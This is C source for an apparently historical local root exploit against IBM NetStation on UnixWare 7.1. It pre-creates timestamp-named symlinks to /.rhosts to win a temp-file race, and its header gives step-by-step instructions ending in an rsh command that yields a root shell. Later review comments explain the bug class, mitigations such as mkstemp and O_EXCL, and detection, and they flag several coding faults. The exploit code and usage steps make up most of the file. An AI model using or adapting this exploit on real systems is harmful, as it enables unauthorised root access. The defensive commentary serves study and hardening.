/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
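 * Exploits a temporary file race condition in NetStation's HTTP interface:
 * as the code below shows, the name being raced is the user's .nsu path
 * with the current time in seconds appended, so it is predictable and can
 * be created in advance as a symbolic link.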
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
 * create it for you.  Next, point your browser at
 * http://localhost:880 and login as a normal user.  Click on "Hardware"
 * Then "workstation".  This will create <netstationdir>/users/xnec.
 * Next, compile and run this program.  You only have thirty seconds from
 * the time you complete this step to then click on "Workstation".  When
 * this is done, you should have an /.rhosts which you own.  On some
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier@usa.net
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

/*
 * Pre-creates 30 symbolic links, one per second of wall-clock time starting
 * at the moment the program runs.  Each link is named <source><epoch-seconds>
 * and each one points at dest.  Takes no arguments and reports nothing: the
 * results of sprintf() and symlink() are never checked.
 *
 * NOTE(review): the file header says the target is a temporary file used by
 * the NetStation HTTP interface.  That the service builds the name from the
 * .nsu path plus a timestamp and opens it without refusing symlinks is
 * implied by this code, not shown by it -- confirm against the product.
 *
 * Defensive reading of the bug class (predictable temp name in a directory
 * an unprivileged user can write to, opened by a privileged process):
 *   - create temp files with mkstemp(), or open() with O_CREAT|O_EXCL, so a
 *     pre-existing symlink makes the open fail instead of being followed;
 *   - keep the working directory writable only by the service account;
 *   - for detection, look for symlinks in the per-user directory whose names
 *     end in a run of digits and whose targets lie outside that directory,
 *     and for an unexpected /.rhosts.
 *
 * NOTE(review): "void main()" is not a standard signature for main.
 */
void main()
{
  /* Site-specific paths; the file header asks the reader to adjust them. */

  char dest[20] = "/.rhosts";                                   /* what every link points at */
  char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";  /* base of the generated names */
  /* Scratch buffer for each generated link name; the initializer is
   * overwritten by the first sprintf() below. */
  char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
  long sec;
  int i;

  /* NOTE(review): time() is declared in <time.h>, which this file does not
   * include directly; whether <sys/time.h> provides it depends on the
   * platform. */
  sec = time(0);

  /* One candidate name per second for the next 30 seconds. */
  for (i = 0; i < 30; i++)
    {
      /* NOTE(review): "%d" is paired with a long expression (sec + i), a
       * format/argument type mismatch.  The write is also unbounded:
       * source is 39 characters, so a 10-digit timestamp plus the
       * terminator fills the 50-byte buffer exactly and anything longer
       * overruns it. */
      sprintf(sourcesym, "%s%d", source, (sec + i));
      /* Return value ignored, so a failure (for example the name already
       * existing) passes silently. */
      symlink(dest,sourcesym);
    }
}